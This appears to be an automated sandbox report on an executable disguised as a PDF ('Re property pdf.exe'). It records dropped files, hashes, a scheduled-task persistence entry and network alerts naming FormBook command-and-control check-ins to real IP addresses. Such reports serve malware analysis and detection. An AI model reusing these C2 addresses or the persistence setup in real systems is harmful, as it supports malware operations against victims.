• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Re property pdf.exe
Time      Type             Description
06:56:08  API Interceptor  2x Sleep call for process: Re property pdf.exe modified
06:56:10  API Interceptor  18x Sleep call for process: powershell.exe modified
06:56:13  API Interceptor  2x Sleep call for process: hwOHPmqcegxcxb.exe modified
06:57:26  API Interceptor  10142781x Sleep call for process: PresentationHost.exe modified
11:56:10  Task Scheduler   Run new task: hwOHPmqcegxcxb path: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe
                                                                                                                            RemotePCViewer.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 66.63.166.194
                                                                                                                            No context
                                                                                                                            No context
                                                                                                                            Process:C:\Users\user\Desktop\Re property pdf.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1216
                                                                                                                            Entropy (8bit):5.34331486778365
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                            Malicious:true
                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                            Process:C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1216
                                                                                                                            Entropy (8bit):5.34331486778365
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                            Malicious:false
                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):2232
                                                                                                                            Entropy (8bit):5.380805901110357
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:lylWSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//ZMRvUyus:lGLHxvCsIfA2KRHmOugras
                                                                                                                            MD5:206820631F5A535AD90324CEA0C3F71B
                                                                                                                            SHA1:A79FC4006BB113CEBB5D00EC355638740985079F
                                                                                                                            SHA-256:AAAB7406C1292ACBC9740C2926E7F3C4B3E2D3D1CCDC31A15D5BEEF73174EF6A
                                                                                                                            SHA-512:53A1B1975EA33ED7C577F923D07B9072222EE4098A4EB363DE0DC7234F80B10A216399132803904885F59A6DE7509C824A5259EE8E89D366C9EE2F7B3AD54AD2
                                                                                                                            Malicious:false
                                                                                                                            Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                            Process:C:\Windows\SysWOW64\PresentationHost.exe
                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):114688
                                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                            Malicious:false
                                                                                                                            Preview:SQLite format 3
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Users\user\Desktop\Re property pdf.exe
                                                                                                                            File Type:XML 1.0 document, ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1580
                                                                                                                            Entropy (8bit):5.116723693613252
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtap9xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTaDv
                                                                                                                            MD5:E8D9B7DF7C39F49D2826876535F11C0A
                                                                                                                            SHA1:859F56DE28201CF6BBB7213C0D165643898A4CAE
                                                                                                                            SHA-256:48FBB2FF40B7CF99F4A1BDEDC11BA37A6E1F7C62BD405DD56CE5A4ECD328F1E8
                                                                                                                            SHA-512:4AC392E7165E07DE5A921B83A67E694C2CAA22976E98F76DE4370C4EB61F4D207B39C1984DC70761FB5112FB2FE0D04F8EBDC32DA05F5D4AC6178EF866626953
                                                                                                                            Malicious:true
                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                                            Process:C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe
                                                                                                                            File Type:XML 1.0 document, ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1580
                                                                                                                            Entropy (8bit):5.116723693613252
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtap9xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTaDv
                                                                                                                            MD5:E8D9B7DF7C39F49D2826876535F11C0A
                                                                                                                            SHA1:859F56DE28201CF6BBB7213C0D165643898A4CAE
                                                                                                                            SHA-256:48FBB2FF40B7CF99F4A1BDEDC11BA37A6E1F7C62BD405DD56CE5A4ECD328F1E8
                                                                                                                            SHA-512:4AC392E7165E07DE5A921B83A67E694C2CAA22976E98F76DE4370C4EB61F4D207B39C1984DC70761FB5112FB2FE0D04F8EBDC32DA05F5D4AC6178EF866626953
                                                                                                                            Malicious:false
                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                                            Process:C:\Users\user\Desktop\Re property pdf.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):702976
                                                                                                                            Entropy (8bit):7.860155640899553
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12288:cKIFhlPlL/LMopPIIA6J1x5/9uQQbolbczlsP7AAsZK4G45AWqpA/:cKIdPlL4wo6PL9EbolbczlsP0A/43d0u
                                                                                                                            MD5:A217FF7DA729F56FAF0BB3DE4AD87F40
                                                                                                                            SHA1:991801525B52069BB48C8C2907DCB587C592CE11
                                                                                                                            SHA-256:A9D4AA43728B39FDE9BA1AE406C10904369C6CCFBEED1C347B847B0E8CA6BCB1
                                                                                                                            SHA-512:070313B2038B7A4E4E2D3CCB0668081136DB1CA0B855BAC3F5DC698E2CCE52E035CFC9E93B63D6578593D6E1104B3D7D069D7E5188FE62E3A967C4B5E8F9CF7E
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                            Process:C:\Users\user\Desktop\Re property pdf.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):26
                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                            Malicious:true
                                                                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Entropy (8bit):7.860155640899553
                                                                                                                            TrID:
                                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                                                            File name:Re property pdf.exe
                                                                                                                            File size:702'976 bytes
                                                                                                                            MD5:a217ff7da729f56faf0bb3de4ad87f40
                                                                                                                            SHA1:991801525b52069bb48c8c2907dcb587c592ce11
                                                                                                                            SHA256:a9d4aa43728b39fde9ba1ae406c10904369c6ccfbeed1c347b847b0e8ca6bcb1
                                                                                                                            SHA512:070313b2038b7a4e4e2d3ccb0668081136db1ca0b855bac3f5dc698e2cce52e035cfc9e93b63d6578593d6e1104b3d7d069d7e5188fe62e3a967c4b5e8f9cf7e
                                                                                                                            SSDEEP:12288:cKIFhlPlL/LMopPIIA6J1x5/9uQQbolbczlsP7AAsZK4G45AWqpA/:cKIdPlL4wo6PL9EbolbczlsP0A/43d0u
                                                                                                                            TLSH:C6E41260A92EEC32C9E517B01130E7B30B769ECCE411D3139AEEECD7BA167963595390
                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g..............0.................. ........@.. ....................... ............`................................
                                                                                                                            Icon Hash:01242c66198d8d9e
                                                                                                                            Entrypoint:0x4ac0ea
                                                                                                                            Entrypoint Section:.text
                                                                                                                            Digitally signed:false
                                                                                                                            Imagebase:0x400000
                                                                                                                            Subsystem:windows gui
                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                            Time Stamp:0x670CAC16 [Mon Oct 14 05:28:54 2024 UTC]
                                                                                                                            TLS Callbacks:
                                                                                                                            CLR (.Net) Version:
                                                                                                                            OS Version Major:4
                                                                                                                            OS Version Minor:0
                                                                                                                            File Version Major:4
                                                                                                                            File Version Minor:0
                                                                                                                            Subsystem Version Major:4
                                                                                                                            Subsystem Version Minor:0
                                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                            Instruction
                                                                                                                            jmp dword ptr [00402000h]
                                                                                                                            add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xac098          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xae000          0x13a0        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xb0000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0xaa0f0       0xaa200   8fcde93f14ddb9ff7422e5b43203b757  False     0.9354421151726672  data       7.86751234729538     IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0xae000          0x13a0        0x1400    ebb35198339d57f64c78c30ea7b3d150  False     0.7779296875        data       7.02613144452689     IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xb0000          0xc           0x200     1a1c52b516a55b98a1461b2cf52e3751  False     0.044921875         data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name           RVA      Size   Type                                                         Language  Country  ZLIB Complexity
RT_ICON        0xae0c8  0xf91  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced                     0.8936010037641154
RT_GROUP_ICON  0xaf06c  0x14   data                                                                            1.05
RT_VERSION     0xaf090  0x30c  data                                                                            0.4307692307692308
DLL          Import
mscoree.dll  _CorExeMain
Timestamp                        SID      Signature                                     Severity  Source IP    Source Port  Dest IP         Dest Port  Protocol
2024-10-19T12:57:04.005504+0200  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2   1         192.168.2.4  49762        3.33.130.190    80         TCP
2024-10-19T12:57:19.980760+0200  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.4  49843        172.67.181.186  80         TCP
2024-10-19T12:57:22.531220+0200  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.4  49858        172.67.181.186  80         TCP
2024-10-19T12:57:22.531220+0200  2856318  ETPRO MALWARE FormBook CnC Checkin (POST) M4  1         192.168.2.4  49858        172.67.181.186  80         TCP
2024-10-19T12:57:25.081677+0200  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.4  49873        172.67.181.186  80         TCP
2024-10-19T12:57:27.617419+0200  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2   1         192.168.2.4  49888        172.67.181.186  80         TCP
2024-10-19T12:57:33.502533+0200  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.4  49919        104.223.44.195  80         TCP
2024-10-19T12:57:36.076138+0200  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.4  49935        104.223.44.195  80         TCP
2024-10-19T12:57:38.646681+0200  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.4  49950        104.223.44.195  80         TCP
2024-10-19T12:57:41.162826+0200  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2   1         192.168.2.4  49965        104.223.44.195  80         TCP
2024-10-19T12:57:46.915593+0200  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.4  49996        203.161.41.204  80         TCP
2024-10-19T12:57:49.499537+0200  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.4  50012        203.161.41.204  80         TCP
2024-10-19T12:57:52.075550+0200  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.4  50018        203.161.41.204  80         TCP
2024-10-19T12:57:54.615907+0200  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2   1         192.168.2.4  50019        203.161.41.204  80         TCP
2024-10-19T12:58:00.290772+0200  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.4  50020        3.33.130.190    80         TCP
2024-10-19T12:58:02.812516+0200  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.4  50021        3.33.130.190    80         TCP
2024-10-19T12:58:05.380413+0200  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.4  50022        3.33.130.190    80         TCP
2024-10-19T12:58:07.936908+0200  2855465  ETPRO MALWARE FormBook CnC Checkin (GET) M2   1         192.168.2.4  50023        3.33.130.190    80         TCP
                                                                                                                            2024-10-19T12:58:14.950484+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450024221.128.225.5780TCP
                                                                                                                            2024-10-19T12:58:17.485658+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450025221.128.225.5780TCP
                                                                                                                            2024-10-19T12:58:20.030369+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450026221.128.225.5780TCP
                                                                                                                            2024-10-19T12:58:22.594449+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450027221.128.225.5780TCP
                                                                                                                            2024-10-19T12:58:29.004494+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450028199.59.243.22780TCP
                                                                                                                            2024-10-19T12:58:31.054944+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450029199.59.243.22780TCP
                                                                                                                            2024-10-19T12:58:33.656681+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450030199.59.243.22780TCP
                                                                                                                            2024-10-19T12:58:36.149413+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450031199.59.243.22780TCP
                                                                                                                            2024-10-19T12:58:41.958210+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450032172.67.196.9080TCP
                                                                                                                            2024-10-19T12:58:44.518082+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450033172.67.196.9080TCP
                                                                                                                            2024-10-19T12:58:47.127683+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450034172.67.196.9080TCP
                                                                                                                            2024-10-19T12:58:49.613095+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450035172.67.196.9080TCP
                                                                                                                            2024-10-19T12:58:55.287439+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500363.33.130.19080TCP
                                                                                                                            2024-10-19T12:58:57.831784+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500373.33.130.19080TCP
                                                                                                                            2024-10-19T12:59:00.399260+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500383.33.130.19080TCP
                                                                                                                            2024-10-19T12:59:02.923816+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4500393.33.130.19080TCP
                                                                                                                            2024-10-19T12:59:09.146277+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500403.33.130.19080TCP
                                                                                                                            2024-10-19T12:59:12.045609+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500413.33.130.19080TCP
                                                                                                                            2024-10-19T12:59:13.710883+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500423.33.130.19080TCP
                                                                                                                            2024-10-19T12:59:16.264611+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4500433.33.130.19080TCP
                                                                                                                            2024-10-19T12:59:22.826779+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500443.33.130.19080TCP
                                                                                                                            2024-10-19T12:59:25.373667+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500453.33.130.19080TCP
                                                                                                                            2024-10-19T12:59:27.045458+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500463.33.130.19080TCP
                                                                                                                            2024-10-19T12:59:29.649501+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4500473.33.130.19080TCP
                                                                                                                            2024-10-19T12:59:36.817387+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450048129.226.56.20080TCP
                                                                                                                            2024-10-19T12:59:39.187204+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450049129.226.56.20080TCP
                                                                                                                            2024-10-19T12:59:42.151328+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450050129.226.56.20080TCP
                                                                                                                            2024-10-19T12:59:44.717271+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450051129.226.56.20080TCP
                                                                                                                            2024-10-19T12:59:50.927787+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45005284.32.84.3280TCP
                                                                                                                            2024-10-19T12:59:53.527213+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45005384.32.84.3280TCP
                                                                                                                            2024-10-19T12:59:56.064035+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45005484.32.84.3280TCP
                                                                                                                            2024-10-19T12:59:58.617220+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45005584.32.84.3280TCP
                                                                                                                            2024-10-19T13:00:04.340210+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500563.33.130.19080TCP
                                                                                                                            2024-10-19T13:00:07.583242+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500573.33.130.19080TCP
                                                                                                                            2024-10-19T13:00:10.114991+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500583.33.130.19080TCP
                                                                                                                            2024-10-19T13:00:13.330521+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4500593.33.130.19080TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                            Oct 19, 2024 12:57:48.768079042 CEST5001280192.168.2.4203.161.41.204
                                                                                                                            Oct 19, 2024 12:57:48.772898912 CEST8050012203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:49.461445093 CEST8050012203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:49.499473095 CEST8050012203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:49.499536991 CEST5001280192.168.2.4203.161.41.204
                                                                                                                            Oct 19, 2024 12:57:50.280272961 CEST5001280192.168.2.4203.161.41.204
                                                                                                                            Oct 19, 2024 12:57:51.299103975 CEST5001880192.168.2.4203.161.41.204
                                                                                                                            Oct 19, 2024 12:57:51.323631048 CEST8050018203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:51.323760033 CEST5001880192.168.2.4203.161.41.204
                                                                                                                            Oct 19, 2024 12:57:51.334908009 CEST5001880192.168.2.4203.161.41.204
                                                                                                                            Oct 19, 2024 12:57:51.339869022 CEST8050018203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:51.339879990 CEST8050018203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:51.339893103 CEST8050018203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:51.339945078 CEST8050018203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:51.339955091 CEST8050018203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:51.339972019 CEST8050018203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:51.339982033 CEST8050018203.161.41.204192.168.2.4
